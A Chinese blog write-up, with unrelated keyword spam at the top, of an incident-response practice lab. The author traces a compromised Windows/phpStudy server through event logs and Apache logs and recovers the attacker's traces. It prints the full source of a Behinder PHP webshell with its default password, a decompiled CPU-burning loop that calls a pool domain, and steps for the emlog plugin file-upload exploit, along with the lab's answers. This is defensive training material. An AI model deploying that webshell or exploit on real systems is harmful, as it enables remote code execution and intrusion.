淘宝做短视频网站服装饰品网站建设

淘宝做短视频网站,服装饰品网站建设,滨湖区建设局网站,汶上做网站这段时间一直在学习内网横向以及代理的知识#xff0c;相信大家也都看腻了#xff0c;今天给大家换个口味#xff1b; 重新拿应急响应的靶机练练手#xff0c;找回当安服仔的感觉#xff1b; 文章目录挑战内容-Web1前景需要#xff1a;应急思路计划任务排查#xff08;无…这段时间一直在学习内网横向以及代理的知识相信大家也都看腻了今天给大家换个口味重新拿应急响应的靶机练练手找回当安服仔的感觉文章目录挑战内容-Web1前景需要应急思路计划任务排查无异常开机启动项排查无异常隐藏用户排查异常日志排查找到隐藏文件攻击者挖矿程序的矿池域名(仅域名)有实力的可以尝试着修复漏洞解题成功总结挑战内容-Web1前景需要小李在值守的过程中发现有CPU占用飙升出于胆子小就立刻将服务器关机并找来正在吃苕皮的hxd帮他分析这是他的服务器系统请你找出以下内容并作为通关条件攻击者的shell密码攻击者的IP地址攻击者的隐藏账户名称攻击者挖矿程序的矿池域名(仅域名)有实力的可以尝试着修复漏洞靶机环境Windows Server 2022phpstudy(小皮面板)账号密码用户:administrator密码:Zgsfadmin.com因为本次靶机难度较小主要是用来找找手感所以大部分步骤涉及Windows应急响应大家可以看看这篇文章了解一下基本的思路Windows日志分析本次主要是介绍我的应急思路就不按着题目去找flag了发现什么是什么好处就是比较贴近真实生产环境不会僵化思维应急思路首先我们登陆靶机发现是一台Server 2012的服务器根据题目“发现有CPU占用飙升”我就猜测系统的计划任务或者开启启动项可能存在脚本于是进行查找计划任务排查无异常单击【开始】【设置】【控制面板】【任务计划】查看计划任务属性便可以发现文件的路径打开后点击Microsoft — Windows即可进行查看这里我们发现了一个计划任务$(%systemroot%\system32\SrvInitConfig.exe,-101)看样子有点异常一般 %systemroot% 就是 C:\Windows 路径因为处于禁用状态我又去他的文件路径C:\system32\进行查看没发现什么异常开机启动项排查无异常1登录服务器单击开始菜单 【运行】输入msconfig查看是否存在命名异常的启动项目是则取消勾选命名异常的启动项目并到命令中显示的路径删除文件2组策略检查打开cmd命令行运行gpedit.msc均未发现异常隐藏用户排查异常既然上述都没有发现异常我们就从隐藏用户下手因为正常的攻击者入侵系统后肯定会建立后门或者用户方便下次登陆# 列出所有本地用户基础排查net user ——隐藏用户排查不出来# 获取用户详细信息含状态、描述、SIDwmic useraccount get Name,Status,Description,Disabled,SID通过这两条命令我们可以得到后门用户生成的时间而这也为我们确定了攻击者攻击的大概时间2024/2/26 23:01:13输入命令可以得到攻击者创建的隐藏用户hack168$所以我们可以得到的隐藏账户名称日志排查在Windows中在进行溯源的时候我们通常是查看“安全”“系统”“应用程序”这三个日志(2025下半年软考考了喔,别问我怎么知道的)WinR 打开运行输入 “eventvwr.msc”回车运行打开事件查看器这里我们通常可以按照特定事件ID来进行排查4624表示帐户已成功登录。这个事件ID可以用来筛选系统中所有成功登录的记录4625表示帐户登录失败。这个事件ID可以帮助我们判断是否存在RDP爆破攻击等情况4634表示帐户被注销。这个事件ID记录了用户注销的情况 4647表示用户发起注销。4648表示试图使用明确的凭证登录。这个事件ID可以查看远程登录的相关信息比如IP地址等4672表示超级管理员登录4720表示新用户的创建所以我们可以输入相应的ID来进行查询在经过排查后基本可以确定攻击者的攻击时间为从2024/2/26 22:16分开始并且在创建隐藏用户后尝试了登陆–既然通过日志知道了攻击者的大概时间那么接下来我们就可以去Web系统的日志来进一步的调查了正常的攻击思路Web服务器 —利用漏洞获取主机www用户 — 获取主机SYSTEM权限蓝队溯源思路日志了解攻击时间 —Web服务器日志查看利用了什么方法进入 —找到攻击路径所以我们来到文件发现phpstudy搭建的是Apache的服务那我们直接查看他的access.log和error.log即可具体步骤可以参照Apache和Linux日志分析主要查看这两个文件经过一段时间的排查我们可以发现在/content/plugins/tips/路径出现大量的shell.php而往上翻可以发现大量的account.php的使用合理猜测是登陆的页面被攻击者进行爆破攻击而看IP地址可以得知攻击者IP为192.168.126.1攻击路径还原攻击者爆破攻击成功进入Web系统 ——通过Web服务的/content/plugins/tips/上传shell.php —— 获取了主机的权限 —— 通过命令提权并建立隐藏用户 —— 生成挖矿程序消耗目标机器 ——造成CPU资源耗尽找到隐藏文件随后我们根据日志的路径来到服务器的相应路径上发现了shell.php文件打开后发现为冰蝎的shell一打开就报毒得到文件内容?php error_reporting(0);session_start();$keye45e329feb5d925b;//该密钥为连接密码32位md5值的前16位默认连接密码rebeyond$_SESSION[k]$key;session_write_close();$postfile_get_contents(php://input);if(!extension_loaded(openssl)){$tbase64_.decode;$post$t($post.);for($i0;$istrlen($post);$i){$post[$i]$post[$i]^$key[$i115];}}else{$postopenssl_decrypt($post,AES128,$key);}$arrexplode(|,$post);$func$arr[0];$params$arr[1];class C{publicfunction__invoke($p){eval($p.);}}call_user_func(new C(),$params);?随后对e45e329feb5d925b进行解密密码为rebeyond攻击者挖矿程序的矿池域名(仅域名)我们之前不是找到了隐藏用户吗我们到他的用户目录下查看有哪些可疑文件发现了一个挖矿文件一点击执行电脑直接崩了。。。随后我我们使用工具pyinstxtractor对exe文件进行进行解包解压为pyc文件随后反编译成py文件再使用工具uncompyle6将pyc文件反编译成py文件pipinstalluncompyle6 uncompyle6 Kuang.pyc下载模块成功得到python文件# uncompyle6 version 3.9.3# Python bytecode version base 3.8.0 (3413)# Decompiled from: Python 3.11.3 (tags/v3.11.3:f3909b8, Apr 4 2023, 23:49:59) [MSC v.1934 64 bit (AMD64)]# Embedded file name: Kuang.pyimportmultiprocessing, requests def cpu_intensive_task():whileTrue: try: requests.get(http://wakuang.zhigongshanfang.top,timeout10)except: passif__name____main__:cpu_countmultiprocessing.cpu_count()processes[multiprocessing.Process(targetcpu_intensive_task)for_inrange(cpu_count)]forprocessinprocesses: process.start()else:forprocessinprocesses: process.join()# okay decompiling Kuang.pyc矿池域名wakuang.zhigongshanfang.top有实力的可以尝试着修复漏洞我们打开phpstudy的Apache和MySQL服务然后到网站看看它搭建了一个什么服务输入网址http://192.168.44.167/发现了几个功能点在我们熟悉系统的同时用dirsearch扫描一下这个系统的目录python dirsearch.py -u http://192.168.44.167/发现了不少东西其中就有我们很熟悉的登陆接口./account.php?actionsignin查看它使用的框架再去查找相应的漏洞emlog v2.5.3版本存在文件上传漏洞该漏洞源于admin/plugin.php插件组件对上传的文件缺少有效的验证。攻击者可利用该漏洞上传恶意文件从而远程执行任意代码。准备一个名为shell的文件夹里面包含shell.php文件内容?php phpinfo();访问目录/content/plugins/shell/shell.php成功回显phpinfo还记得我们之前检查日志时发现的爆破行为吗所以我们可以猜测这个系统存在弱口令漏洞用bp进行爆破后成功进入后台系统而针对这个系统的漏洞使用强口令及时更新系统版本对每个登陆的用户进行身份认证赋予唯一的Session ID解题成功用cmd打开桌面上的解题.exe分别输入命令成功解题C:\Users\Administrator\Desktop解题.exe 公众号知攻善防实验室 欢迎使用知攻善防实验室-应急响应训练靶机解题系统 在此之前您应该获取到以下信息1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名 你准备好了吗y or ny 请输入攻击者的shell密码:rebeyond 题解正确 请输入攻击者的IP地址192.168.126.1 题解正确 请输入攻击者的隐藏账户名称:hack168$ 题解正确 请输入攻击者挖矿程序的矿池域名:wakuang.zhigongshanfang.top 题解正确 恭喜您该靶机已被您攻破 恭喜您该靶机已被您攻破 恭喜您该靶机已被您攻破 恭喜您该靶机已被您攻破总结本次靶机难度不高主要适合刚入门尝试练习的师傅期待下次再见